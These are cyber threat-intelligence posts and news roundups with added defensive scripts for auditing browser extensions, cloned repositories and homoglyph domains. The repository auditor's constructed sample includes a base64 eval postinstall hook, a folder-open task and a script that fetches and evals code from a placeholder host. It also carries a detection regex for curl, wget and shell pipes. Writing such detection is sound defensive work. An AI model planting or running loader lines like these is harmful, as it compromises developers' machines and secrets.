"The Invisible Front" — my book on cyberwarfare as a geopolitical pillar is now on Amazon.

The core argument: a well-crafted piece of malware can be more strategically dangerous than a missile. Not hyperbole — the doctrine, the attribution problems, and the asymmetry of cost all point the same direction.

The book covers:
→ Cyberwarfare as modern geopolitical instrument — not a side channel, a primary front
→ Why attribution is the hardest problem and why states exploit that gap deliberately
→ The asymmetry: a nation-state attack costs thousands, defending against it costs billions
→ How the invisible front interacts with kinetic warfare, sanctions, and information ops

Written for security professionals, policymakers, and anyone trying to understand why the next major conflict will be decided before a single tank moves.

https://www.amazon.com/dp/B0GHSFJTVY

#infosec #cyberwarfare #geopolitics #threatintel #nationstate #research #cybersecurity


Iran’s MOIS-linked cybercrime operations highlight how state actors blur lines between espionage, crime, and disruption. In cyberspace, attribution and intent rarely come clean. 🕵️‍♂️⚠️ #NationState #CyberEspionage

https://www.theregister.com/2026/03/10/cybercrime_iran_mois/

Cybercrime isn't just a cover for Iran's government goons - it's a key part of their operations: Ransomware, malware-as-a-service, infostealers benefit MOIS, too (The Register)

There's a long list of well-known #externalities that the profit-addicted entities impose on the world. The narrative of "public vs private" is a false dichotomy. Both are created through our collective power, manifested by our current choice of #nationstate organization who grants their status.

Alright team, it's been a pretty packed week in cyber, with some notable breaches, a deep dive into nation-state TTPs, critical vulnerabilities under active exploitation, and some interesting discussions around AI's role in both attack and defence. Let's get into it:

Recent Cyber Attacks or Breaches 🚨

- The FBI is probing a breach of its unclassified systems, which reportedly contained "law enforcement sensitive information" related to wiretapping and foreign intelligence surveillance warrants, including PII of investigation subjects. This follows previous compromises of US law enforcement wiretapping systems by Chinese state-backed actors.
- Chinese EV charger manufacturer ELECQ suffered a ransomware attack on its AWS cloud platform, leading to the encryption and copying of customer databases containing names, email addresses, phone numbers, and home addresses. No financial data was compromised, and charging devices were unaffected.
- Ericsson Inc. disclosed a data breach affecting employees and customers, including SSNs and financial info for thousands, due to a hack on one of its service providers. This highlights persistent supply chain risks, even if no data misuse has been confirmed yet.
- The ShinyHunters threat actor claims to be actively exploiting misconfigured Salesforce Experience Cloud platforms, targeting the `/s/sfsites/aura` API endpoint to steal data. Salesforce attributes this to customer misconfigurations, not a platform vulnerability, and has issued guidance to restrict guest user permissions.
- Two popular Chrome extensions, "QuickLens" and "ShotBird," turned malicious after ownership transfer, enabling code injection and data theft by stripping security headers, injecting JavaScript from C2, and delivering fake browser updates leading to credential harvesting. This highlights a critical extension supply chain risk.
- The FBI is warning of phishing attacks impersonating US city and county planning/zoning officials, targeting businesses and individuals applying for land-use permits. Attackers use publicly available info to craft convincing emails, demanding fraudulent fees via wire transfer, P2P, or cryptocurrency.
- Dutch intelligence agencies have warned of a "large-scale" Russian cyber campaign targeting the Signal and WhatsApp accounts of government officials, journalists, and military personnel worldwide. Attackers use social engineering to trick victims into sharing verification codes or into approving a "linked device"; neither technique breaks the end-to-end encryption, it simply makes the attacker's device a legitimate endpoint that receives messages in the clear. Reviewing the linked-devices list and enabling registration lock (Signal) or two-step verification (WhatsApp) are the practical mitigations.
- LastPass has alerted users to a new phishing campaign using display name spoofing and fake internal email threads to impersonate LastPass and direct victims to imitation SSO pages to harvest credentials. Users are reminded LastPass will never ask for their master password.

🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/03/08/fbi_investigates_wiretap_system_breach/
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/03/09/ransomware_crooks_hit_ev_charger/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/ericsson-us-discloses-data-breach-after-service-provider-hack/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/shinyhunters-claims-ongoing-salesforce-aura-data-theft-attacks/
📰 The Hacker News | https://thehackernews.com/2026/03/chrome-extension-turns-malicious-after.html
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/fbi-warns-of-phishing-attacks-impersonating-us-city-county-officials/
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/03/09/dutch_spies_say_russian_cybercrims/
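The QuickLens/ShotBird item is a reminder that an extension update can change what the extension is allowed to do. One way to catch the behaviours described above before trusting an update is to diff the manifest between versions and scan the declarativeNetRequest ruleset for rules that remove security headers. The script below is an added example, not code from the report or from the extensions themselves; the manifest and rules are constructed samples in the Manifest V3 / declarativeNetRequest format, and the permission and header lists are this editor's choice of what to flag.

```python
"""Audit a Chrome extension update for new broad host access and
declarativeNetRequest rules that strip security headers.
Added example with constructed sample data; not the real extensions' files."""
import json
from typing import Dict, List

# Response headers whose removal lets injected scripts and framing succeed.
SECURITY_HEADERS = {
    "content-security-policy",
    "content-security-policy-report-only",
    "x-frame-options",
    "strict-transport-security",
    "x-content-type-options",
}
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
# Permissions that let an extension run code in pages or rewrite traffic.
RISKY_PERMISSIONS = {"scripting", "declarativeNetRequest",
                     "declarativeNetRequestWithHostAccess", "webRequest", "cookies"}

# Constructed sample: a benign v1.4.0 manifest and a post-transfer v1.5.0 update.
OLD_MANIFEST_JSON = """{
  "manifest_version": 3, "name": "SampleLens", "version": "1.4.0",
  "permissions": ["activeTab", "storage"], "host_permissions": []
}"""
NEW_MANIFEST_JSON = """{
  "manifest_version": 3, "name": "SampleLens", "version": "1.5.0",
  "permissions": ["activeTab", "storage", "scripting", "declarativeNetRequest"],
  "host_permissions": ["<all_urls>"],
  "declarative_net_request": {"rule_resources": [
    {"id": "ruleset_1", "enabled": true, "path": "rules.json"}]}
}"""
NEW_RULES_JSON = """[
  {"id": 1, "priority": 1,
   "action": {"type": "modifyHeaders", "responseHeaders": [
     {"header": "Content-Security-Policy", "operation": "remove"},
     {"header": "X-Frame-Options", "operation": "remove"}]},
   "condition": {"urlFilter": "*", "resourceTypes": ["main_frame", "sub_frame"]}},
  {"id": 2, "priority": 1, "action": {"type": "block"},
   "condition": {"urlFilter": "||ads.example/", "resourceTypes": ["script"]}}
]"""


def header_strip_findings(rules: List[dict]) -> List[str]:
    """Report modifyHeaders rules that remove or overwrite a security header."""
    findings = []
    for rule in rules:
        action = rule.get("action", {})
        if action.get("type") != "modifyHeaders":
            continue
        scope = rule.get("condition", {}).get("urlFilter", "(all URLs)")
        for hdr in action.get("responseHeaders", []):
            name = hdr.get("header", "").lower()
            if name in SECURITY_HEADERS and hdr.get("operation") in ("remove", "set"):
                findings.append(f"rule {rule.get('id')}: {hdr['operation']} {name} on {scope}")
    return findings


def audit_update(old_manifest: dict, new_manifest: dict, new_rules: List[dict]) -> Dict:
    """Diff permissions and host access between versions, then scan the new ruleset."""
    new_perms = set(new_manifest.get("permissions", [])) - set(old_manifest.get("permissions", []))
    new_hosts = set(new_manifest.get("host_permissions", [])) - set(old_manifest.get("host_permissions", []))
    strips = header_strip_findings(new_rules)
    suspicious = bool(strips) or bool(new_perms & RISKY_PERMISSIONS) or bool(new_hosts & BROAD_HOSTS)
    return {
        "new_permissions": sorted(new_perms),
        "new_hosts": sorted(new_hosts),
        "header_strips": strips,
        "verdict": "review" if suspicious else "ok",
    }


def audit_sample() -> Dict:
    """Run the audit over the constructed sample update."""
    return audit_update(json.loads(OLD_MANIFEST_JSON), json.loads(NEW_MANIFEST_JSON),
                        json.loads(NEW_RULES_JSON))


if __name__ == "__main__":
    for key, value in audit_sample().items():
        print(f"{key}: {value}")
```

The same diff can be run from the extension's store listing history or from an enterprise allow-list pipeline: a version that adds `<all_urls>` plus `declarativeNetRequest` and ships a header-removal rule is exactly the post-transfer change the report describes, and it should trigger a manual review before the update reaches managed browsers.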

New Threat Research on Threat Actors/Groups, Ransomware, Malware, or Techniques and Tradecraft 🛡️

- CL-UNK-1068, a Chinese-speaking threat actor, has been conducting cyber-espionage against critical infrastructure sectors across South, Southeast, and East Asia since 2020. They use custom malware, open-source tools, and living-off-the-land binaries, gaining initial access via web server exploitation and web shells, then moving laterally for credential theft and data exfiltration.
- The Pakistan-aligned threat actor Transparent Tribe is leveraging AI-powered coding tools to generate "vibe-coded" malware in niche programming languages (Nim, Zig, Crystal) to target Indian government entities and embassies. This approach allows them to flood target environments with disposable, polyglot binaries, enhancing evasion.
- The Iranian hacking group MuddyWater (aka Seedworm) has targeted US companies, including banks, airports, and non-profits, as well as an Israeli software firm, in a campaign that intensified after US-Israel military strikes on Iran. This activity aligns with a broader trend of hacktivist-fueled cyberattacks and wiper campaigns.
- A Russian national, Evgenii Ptitsyn, has pleaded guilty in a US federal court for his role in the Phobos ransomware operation, which extorted over $39 million from more than 1,000 public and private entities globally. This conviction highlights ongoing international law enforcement efforts to disrupt ransomware ecosystems.

💡 Dark Reading | https://www.darkreading.com/threat-intelligence/chinese-cyber-threat-critical-asian-sectors
📰 The Hacker News | https://thehackernews.com/2026/03/transparent-tribe-uses-ai-to-mass.html
📰 The Hacker News | https://thehackernews.com/2026/03/iran-linked-muddywater-hackers-target.html
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/03/08/fbi_investigates_wiretap_system_breach/

Vulnerabilities, Exploits, and Zero-Days ⚠️

- A high-severity buffer over-read vulnerability (CVE-2026-21385, CVSS 7.8) in Qualcomm's Graphics component, affecting Android devices, is under "limited, targeted exploitation" in the wild. This flaw can lead to memory corruption and arbitrary code execution.
- Google has detailed "Coruna" (aka CryptoWaters), a powerful exploit kit featuring five full iOS exploit chains and 23 exploits, targeting Apple iPhones running iOS versions 13.0 to 17.2.1. The kit's evolution is noteworthy, starting as a commercial surveillance tool and later repurposed by Russian espionage and Chinese financial actors.
- Microsoft Azure CTO Mark Russinovich demonstrated how Anthropic's Claude Opus 4.6 AI successfully decompiled 40-year-old Apple II machine code and identified security vulnerabilities, including "silent incorrect behavior." Anthropic's Red Team previously warned that Claude Opus 4.6 found high-severity vulnerabilities, some decades-old, in well-tested codebases like Firefox (22 new bugs, 14 high-severity).

📰 The Hacker News | https://thehackernews.com/2026/03/google-confirms-cve-2026-21385-in.html
📰 The Hacker News | https://thehackernews.com/2026/03/coruna-ios-exploit-kit-uses-23-exploits.html
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/03/09/claude_legacy_code_vulns/
📰 The Hacker News | https://thehackernews.com/2026/03/anthropic-finds-22-firefox.html

Threat Landscape Commentary 🌍

- Ransomware attacks are increasingly frequent and impactful, with over 5,600 publicly disclosed incidents worldwide in 2024, costing an average of $2.73 million per incident and sometimes human lives. Former FBI and CISA leaders advocate for the administration's National Cyber Strategy, stressing the need for sustained, focused government-industry collaboration, prioritising critical sectors for resilience, and holding cryptocurrency exchanges accountable.
- Agentic AI is poised to deliver exponential productivity gains but simultaneously expands attack surfaces and scales attacker capabilities, creating an "AI arms race" in cybersecurity. While 88% of organisations are already using AI-driven remediation, concerns remain about trust in AI decisions and AI's own security risks.
- The ongoing US-Iran conflict marks a significant shift, with the cyber domain playing a central and openly acknowledged role, unlike previous military engagements. This highlights the increasing integration of cyber capabilities into modern warfare and its direct impact on geopolitical conflicts.

🤫 CyberScoop | https://cyberscoop.com/national-cyber-strategy-ransomware-prioritization-op-ed/
💡 Dark Reading | https://www.darkreading.com/application-security/auto-remediation-agentic-ai
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/03/09/kettle_2026_episode_01_iran_war/

Regulatory Issues or Changes ⚖️

- Europol, in coordinated operations, dismantled Tycoon2FA, a dominant phishing-as-a-service (PhaaS) platform behind 62% of the phishing attempts Microsoft blocked, and LeakBase, a stolen-data marketplace with over 142,000 registered users. Both takedowns are significant wins against the cybercrime ecosystem.
- Dutch national police have launched a novel "Game Over?!" campaign, giving 100 alleged scammers less than two weeks to surrender or face public shaming through unblurred photos on roadside ads and TV. This aggressive tactic aims to identify suspects, deter new recruits, and combat a surge in fake police/bank employee scams.
- Microsoft Teams is rolling out a new feature in May 2026 that will automatically tag third-party bots in meeting lobbies, requiring explicit admission by organisers. This enhancement aims to prevent malicious or unrecognised non-human participants from accidentally joining meetings, giving organisers full control and improving security.

🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/03/08/fbi_investigates_wiretap_system_breach/
📰 The Hacker News | https://thehackernews.com/2026/03/europol-led-operation-takes-down-tycoon.html
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/03/09/dutch_police_fraud_shaming/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/microsoft/microsoft-teams-will-tag-third-party-bots-in-meeting-lobbies/

Government Staffing or Program Changes 🏛️

- National Cyber Director Sean Cairncross detailed upcoming initiatives for the Trump administration's cyber strategy, including an "interagency cell" to confront malign hackers through diplomatic efforts, arrests, and cyber offense. The strategy also involves pilot programs for critical infrastructure security tailored to specific industries and states, and a review of regulations like the SEC's incident disclosure rule.
- Cairncross emphasised better information sharing with industry, a call for private sector resource dedication, and plans for a cybersecurity academy, foundry, and accelerator to address workforce gaps and innovation.

🤫 CyberScoop | https://cyberscoop.com/national-cyber-director-trump-cyber-strategy-interagency-cell-critical-infrastructure-pilots/

Crypto Flows to Sanctioned Entities 💰

- Chainalysis research puts sanction-related cryptocurrency flows at $154 billion in 2025, a 694% year-over-year increase, of which $104 billion went directly to sanctioned entities and the remainder to other illicit addresses. The ruble-backed A7A5 stablecoin alone processed $93.3 billion, serving as a bridge for Russian businesses to reach global markets despite sanctions.

🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/03/08/fbi_investigates_wiretap_system_breach/

#CyberSecurity #ThreatIntelligence #Ransomware #NationState #APT #ZeroDay #Vulnerability #Phishing #AI #DataBreach #IncidentResponse #LawEnforcement #CriticalInfrastructure #SupplyChainSecurity

FBI is investigating breach that may have hit its wiretapping tools (The Register, Infosec In Brief: PLUS Europol takes down two crime gangs; LastPass users phished (again); Crooks increase crypto hauls; and more)
China's zero-day use may be down, but its stockpile and pipeline are stronger than ever: strict vulnerability reporting laws, massive exploit contests, and new PLA cyber forces all feed a centralized vulnerability machine. 🔗https://zurl.co/ZSzFC #cybersecurity #zeroday #China #nationstate

We Are Witnessing The Return of Empires & The END of Nations

Nearly all of us on Earth live within a 'nation-state'. Nation-states are an invisible and seemingly inevitable and eternal part of the infrastructure that forms our society: the water we swim in. Rarely do we pause to consider how this global system of nation-states came into being, and what might replace it after it's gone

https://youtu.be/Mo88imJNWkU?si=c2kiW6eqKGpVad_E

#AaronBastani #RanaDasgupta #democracy #WorkersRights #NationState #WorldOrder


Good morning, cyber pros! ☕ It's been a busy 24 hours with some critical zero-day warnings, new insights into nation-state influence operations, and a few notable breaches. Let's dive into the details:

Recent Breaches: Medical, Retail, and Sports Hit 🚨

- Medical device manufacturer UFP Technologies confirmed a cyber incident on 14 February, leading to data theft and potential destruction, though primary IT systems remain operational.
- French football club Olympique de Marseille reported an "attempted cyberattack" after a threat actor leaked samples claiming 400,000 individuals' data and 2,050 Drupal CMS accounts were stolen.
- European DIY retailer ManoMano disclosed a data breach affecting 38 million customers, stemming from a compromised third-party customer service provider, exposing names, emails, phone numbers, and communications.

🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/medical-device-maker-ufp-technologies-warns-of-data-stolen-in-cyberattack/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/olympique-marseille-football-club-confirms-cyberattack-after-data-leak/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/european-dyi-chain-manomano-data-breach-impacts-38-million-customers/

Critical Zero-Days and RCE Flaws Under the Spotlight ⚠️

- Five Eyes agencies, including CISA, which issued an emergency directive, warned that a critical Cisco Catalyst SD-WAN authentication bypass (CVE-2026-20127, CVSS 10.0) has been exploited as a zero-day since 2023 by a "highly sophisticated threat actor" tracked as UAT-8616, chained with the older CVE-2022-20775 (CVSS 7.8) to reach root on devices at critical infrastructure organisations.
- Check Point discovered multiple RCE and API key theft vulnerabilities in Anthropic's Claude Code, stemming from malicious configuration files in repositories, highlighting new supply chain risks in AI-driven development.
- A critical RCE flaw (CVE-2026-21902, CVSS 10.0) in Juniper Networks PTX Series routers allows unauthenticated root code execution due to an exposed internal service; immediate patching or access restriction is advised.
- Trend Micro patched two critical path traversal flaws (CVE-2025-71210, CVE-2025-71211) in the Apex One management console that allow remote code execution by an attacker who can reach the console; the risk is highest where the console is exposed to the internet.
- Previously harmless Google API keys, when exposed client-side, can now authenticate to Gemini AI, potentially allowing attackers to access private data and incur significant usage charges.

🤫 CyberScoop | https://cyberscoop.com/cisco-zero-days-cisa-emergency-directive-five-eyes/
📰 The Hacker News | https://thehackernews.com/2026/02/cisco-sd-wan-zero-day-cve-2026-20127.html
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/26/five_eyes_cisco_sdwan/
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/26/clade_code_cves/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/critical-juniper-networks-ptx-flaw-allows-full-router-takeover/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/trend-micro-warns-of-critical-apex-one-rce-vulnerabilities/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/previously-harmless-google-api-keys-now-expose-gemini-ai-data/

Evolving Threat Actor TTPs: AI, Supply Chain, and Social Engineering 🛡️

- A coordinated campaign is targeting software developers with fake Next.js job interview repositories, using multiple execution triggers (VS Code, npm run dev, backend startup) to deliver in-memory JavaScript backdoors for RCE and data exfiltration.
- OpenAI reported nation-state actors, including a CCP-linked individual and a Russian group ("Operation No Bell"), are using ChatGPT for politically motivated influence operations, from drafting smear campaigns to generating geopolitical articles.
- A malicious NuGet package, StripeApi.Net, was discovered typosquatting the legitimate Stripe.net library, designed to steal Stripe API tokens from unsuspecting developers while maintaining application functionality.
- The cybercrime group Scattered Lapsus$ Hunters (SLSH) is actively recruiting women for vishing calls to IT helpdesks, aiming to enhance social engineering effectiveness by leveraging different voice profiles.
- Google disrupted a China-linked cyberespionage campaign (UNC2814) active since 2017, targeting telcos and governments in 42 countries, using a new Gridtide backdoor and abusing Google Sheets for C2 communications.

🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/fake-nextjs-job-interview-tests-backdoor-developers-devices/
📰 The Hacker News | https://thehackernews.com/2026/02/fake-nextjs-repos-target-developers.html
👁️ Dark Reading | https://www.darkreading.com/cyberattacks-data-breaches/chinese-police-chatgpt-smear-japan-pm-takaichi
📰 The Hacker News | https://thehackernews.com/2026/02/malicious-stripeapi-nuget-package.html
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/26/scattered_lapsus_hunters_female_recruits/
🗞️ The Record | https://therecord.media/google-disrupts-china-linked-cyberespionage-campaign-spanning-dozens-of-countries

Ransomware Trends and AI's Double-Edged Sword 📊

- Despite a 50% surge in ransomware attacks, the payment rate dropped to a record low of 28% in 2025, though the median ransom paid significantly increased to $59,556, indicating a shift in victim behaviour and attacker tactics.
- Veracode's report highlights a growing "security debt," with 82% of companies having unresolved vulnerabilities for over a year, suggesting that the rapid pace of AI-driven development is creating more flaws than can be fixed, making comprehensive security "unattainable."
- The UK government has implemented a new Vulnerability Monitoring Service, significantly reducing the median fix time for critical public sector vulnerabilities from 50 to 8 days, addressing long-standing issues with digital defences.

🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/ransomware-payment-rate-drops-to-record-low-despite-attack-surge/
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/26/veracode_security_ai/
🗞️ The Record | https://therecord.media/united-kingdom-vulnerability-scanning-cyber

FTC Clarifies COPPA for Age Verification 🔒

- The Federal Trade Commission (FTC) issued a policy statement clarifying that it will not enforce COPPA against companies using age verification technologies, provided strict conditions are met regarding data use, retention, notice, and security.
- This aims to encourage the adoption of age verification tools without fear of COPPA violations, with the FTC planning a broader review of the COPPA Rule to address this area.

🗞️ The Record | https://therecord.media/ftc-says-it-wont-enforce-coppa-age-verification

#CyberSecurity #ThreatIntelligence #ZeroDay #RCE #Vulnerability #APT #NationState #SupplyChainAttack #SocialEngineering #AI #Ransomware #DataBreach #DataPrivacy #InfoSec #CyberAttack #IncidentResponse


It's been a busy 24 hours in the cyber world with significant updates on nation-state activity, several actively exploited vulnerabilities, major data breaches, and a stark reminder about insider threats and the evolving regulatory landscape. Let's dive in:

Recent Cyber Attacks and Breaches ⚠️

- Wynn Resorts confirmed an employee data breach after the ShinyHunters extortion gang listed it, claiming over 800k records with PII (including SSNs) were stolen. Wynn stated the attackers claim to have deleted the data; security experts view such claims with scepticism, since they usually imply a ransom was paid.
- Medical device manufacturer UFP Technologies reported a cyberattack where some IT systems were isolated and data was stolen or destroyed, though backups facilitated restoration. The company is investigating the extent of sensitive data exfiltration and expects cyber insurance to cover most costs.
- Marquis Software Solutions is suing SonicWall, alleging gross negligence led to a ransomware attack affecting 74 US banks. The breach was traced to a security flaw in SonicWall's MySonicWall cloud backup service, exposing configuration data and MFA scratch codes, rather than an unpatched firewall vulnerability.
- Health insurance tech provider TriZetto Provider Solutions updated a 2024 data breach figure, now impacting over 3.4 million people. A hacker accessed historical eligibility reports via a web portal, exposing sensitive healthcare data including SSNs and health insurance numbers.

🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/wynn-resorts-confirms-employee-data-breach-after-extortion-threat/
🗞️ The Record | https://therecord.media/ufp-technologies-medical-devices-sec-filing-cyberattack
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/marquis-sues-sonicwall-over-backup-breach-that-led-to-ransomware-attack/
🗞️ The Record | https://therecord.media/trizetto-healthcare-tech-company-data-breach-update
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/25/wynn_resorts_shinyhunters/

New Threat Research: Actors, Malware, and Tradecraft 🛡️

- North Korea's Lazarus Group has been observed deploying Medusa ransomware in recent attacks, including against a Middle Eastern organisation and an unsuccessful attempt on a US healthcare entity. This highlights Lazarus's continued financial motivation and willingness to target critical infrastructure.
- Google's Threat Intelligence Group (GTIG) and Mandiant disrupted a global espionage campaign by suspected Chinese threat actor UNC2814, impacting 53 organisations in 42 countries. The group used a new C-based backdoor, 'GRIDTIDE,' which abuses the Google Sheets API for evasive command-and-control (C2) operations, blending malicious traffic with normal activity.
- A financially motivated group, "Diesel Vortex," is targeting freight and logistics operators in the US and Europe with sophisticated phishing campaigns using 52 domains. They stole over 1,600 unique credentials, employing Cyrillic homoglyph tricks, voice phishing, and a multi-stage cloaking process to evade detection and facilitate cargo diversion.
- A new cybercrime service, '1Campaign,' lets threat actors run persistent malicious Google Ads using cloaking: it fingerprints and filters out security researchers, serving them benign content while directing real victims to phishing or crypto-drainer sites, effectively evading scrutiny.
- Telephone-Oriented Attack Delivery (TOAD) phishing emails, which contain only a phone number in a fake billing notification, are increasingly bypassing secure email gateways. This is due to their indistinguishability from legitimate business contacts, often combined with other evasion tactics like QR codes and multi-hop redirects.
- Hackers are luring Next.js developers with malicious GitHub repositories disguised as legitimate job interview projects. These repos execute secret-stealing malware in memory, often triggered by Visual Studio Code's workspace automation or running the project's development server, exfiltrating sensitive data like source code and secrets.
- OpenAI has banned a user with links to Chinese law enforcement who attempted to use ChatGPT to plan and track smear campaigns against critics of the Chinese Communist Party, including the Japanese Prime Minister. This highlights the use of AI in sophisticated influence operations and transnational repression tactics like creating fake obituaries and mass-reporting social media accounts.

🕶️ Dark Reading | https://www.darkreading.com/cyberattacks-data-breaches/lazarus-group-new-position-medusa-ransomware
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/chinese-cyberspies-breached-dozens-of-telecom-firms-govt-agencies/
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/25/google_and_friends_disrupt_unc2814/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/phishing-campaign-targets-freight-and-logistics-orgs-in-the-us-europe/
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/1campaign-platform-helps-malicious-google-ads-evade-detection/
🕶️ Dark Reading | https://www.darkreading.com/threat-intelligence/why-call-this-number-toad-emails-beat-gateways
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/25/fake_interview_repos_lure_nextjs_devs_into_running_secret_stealing_malware/
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/25/chinese_law_enforcement_chatgpt_abuse/
🤫 CyberScoop | https://cyberscoop.com/chinese-chatgpt-online-harassment-campaign-against-critics-dissidents/
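The fake-interview repositories (covered in this roundup and in the previous one) rely on triggers a developer fires without thinking: opening the folder in VS Code, `npm install`, `npm run dev`, and the framework's own startup files. The script below is an added example of a pre-open audit for a cloned repo, not tooling from any of the cited reports; the repository contents are constructed (the encoded blob decodes to a harmless `console.log(1)`), the file paths scanned are a Next.js-specific assumption, and the pattern list is a heuristic rather than a signature set.

```python
"""Pre-open audit of an untrusted repository for the execution triggers the
fake-interview lures abuse: VS Code tasks that run on folder open, npm lifecycle
and dev scripts, and code that runs when the framework starts. Added example;
SAMPLE_REPO is a constructed in-memory repo, not the real lure."""
import json
import re
from typing import Dict, List

# Heuristic patterns typical of staged, in-memory loaders: eval of fetched or
# encoded code, shell pipes, child process spawning, remote URLs in scripts.
SUSPICIOUS = re.compile(
    r"(node\s+-e\b|\beval\s*\(|new\s+Function\s*\(|child_process|\bexec(?:Sync)?\s*\(|"
    r"\bcurl\s|\bwget\s|\|\s*(?:ba)?sh\b|base64|https?://[^\s'\"]+)",
    re.IGNORECASE,
)
# A hook script that runs repo-local JavaScript before the framework CLI.
LOCAL_NODE = re.compile(r"\bnode\s+\.?/?[\w./-]+\.[cm]?js\b")
# npm scripts that run without the developer explicitly asking for that script.
NPM_HOOKS = {"preinstall", "install", "postinstall", "prepare", "prepublish", "dev", "start"}

SAMPLE_REPO: Dict[str, str] = {
    ".vscode/tasks.json": json.dumps({"version": "2.0.0", "tasks": [{
        "label": "setup", "type": "shell", "command": "npm install",
        "runOptions": {"runOn": "folderOpen"}}]}),
    "package.json": json.dumps({"name": "interview-task", "scripts": {
        "dev": "node ./scripts/bootstrap.js && next dev",
        # The blob decodes to console.log(1); a real lure carries a loader here.
        "postinstall": "node -e \"eval(Buffer.from('Y29uc29sZS5sb2coMSk=','base64').toString())\"",
        "build": "next build"}}),
    "next.config.js": "const { execSync } = require('child_process');\n"
                      "module.exports = { reactStrictMode: true };\n",
    "scripts/bootstrap.js": "const https = require('https');\n"
                            "https.get('https://cdn.example.invalid/p', r => {\n"
                            "  let d = ''; r.on('data', c => d += c); r.on('end', () => eval(d));\n"
                            "});\n",
    "pages/index.js": "export default function Home() { return <h1>Hi</h1>; }\n",
}


def audit_vscode_tasks(files: Dict[str, str]) -> List[str]:
    """Flag tasks with runOptions.runOn == "folderOpen": they execute when the folder opens."""
    raw = files.get(".vscode/tasks.json")
    if not raw:
        return []
    raw = re.sub(r"^\s*//.*$", "", raw, flags=re.M)  # tasks.json may be JSONC
    return [f"tasks.json: task '{t.get('label')}' runs on folderOpen: {t.get('command')}"
            for t in json.loads(raw).get("tasks", [])
            if t.get("runOptions", {}).get("runOn") == "folderOpen"]


def audit_npm_scripts(files: Dict[str, str]) -> List[str]:
    """Flag lifecycle/dev scripts that look like loaders or run repo-local code first."""
    raw = files.get("package.json")
    if not raw:
        return []
    findings = []
    for name, cmd in json.loads(raw).get("scripts", {}).items():
        if name not in NPM_HOOKS:
            continue
        if SUSPICIOUS.search(cmd):
            findings.append(f"package.json: '{name}' matches loader pattern: {cmd}")
        elif LOCAL_NODE.search(cmd):
            findings.append(f"package.json: '{name}' runs repo-local code before the framework: {cmd}")
    return findings


def audit_startup_code(files: Dict[str, str]) -> List[str]:
    """Scan files that execute on 'next dev' (next.config.*) or from hook scripts (scripts/)."""
    return [f"{path}: runs at startup and matches loader pattern"
            for path, src in files.items()
            if (path.startswith("next.config.") or path.startswith("scripts/"))
            and SUSPICIOUS.search(src)]


def audit_repo(files: Dict[str, str]) -> Dict:
    """Combine the three trigger checks; an empty findings list means no known trigger."""
    findings = audit_vscode_tasks(files) + audit_npm_scripts(files) + audit_startup_code(files)
    return {"findings": findings, "safe_to_open": not findings}


if __name__ == "__main__":
    for line in audit_repo(SAMPLE_REPO)["findings"]:
        print(line)
```

Run it on the clone before opening the folder in an editor; a clean result is not proof of safety (the patterns are heuristics and the lure can live in any file the build touches), but any hit is reason to read that file in a plain viewer first, or to open the repository only in a disposable container.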
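Diesel Vortex's Cyrillic homoglyph domains work because a Cyrillic а or е is visually identical to its Latin neighbour in most fonts. The check below, an added example rather than anything from the report, decodes punycode labels, flags labels that mix Latin and Cyrillic letters, and maps the confusable letters to a Latin "skeleton" that is compared against a list of protected names. The brand names and domains are constructed, the confusables table is a hand-picked subset of the Unicode confusables, and the registrable-label pick ignores multi-part public suffixes.

```python
"""Detect homoglyph lookalike domains built from Cyrillic letters.
Added example; CONFUSABLES is a hand-picked subset of the Unicode confusables,
and PROTECTED / SAMPLE_DOMAINS are constructed."""
import unicodedata
from typing import Dict, List, Set

# Cyrillic lowercase letters that render like Latin letters -> Latin lookalike.
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0443": "y", "\u0445": "x", "\u0456": "i", "\u0458": "j", "\u0455": "s",
    "\u04bb": "h", "\u0501": "d", "\u051b": "q", "\u051d": "w", "\u04cf": "l",
}
PROTECTED: Set[str] = {"cargoline", "coop"}  # constructed brand names to defend
SAMPLE_DOMAINS: List[str] = [
    "c\u0430rgoline.com",            # Latin with one Cyrillic 'а' (mixed script)
    "\u0441\u043e\u043e\u0440.com",  # 'соор': entirely Cyrillic, reads as 'coop'
    "cargoline.com",                 # the genuine name
]


def decode_label(label: str) -> str:
    """Turn an A-label (xn--...) back into Unicode; leave plain labels alone."""
    if label.lower().startswith("xn--"):
        return label.encode("ascii").decode("idna")
    return label


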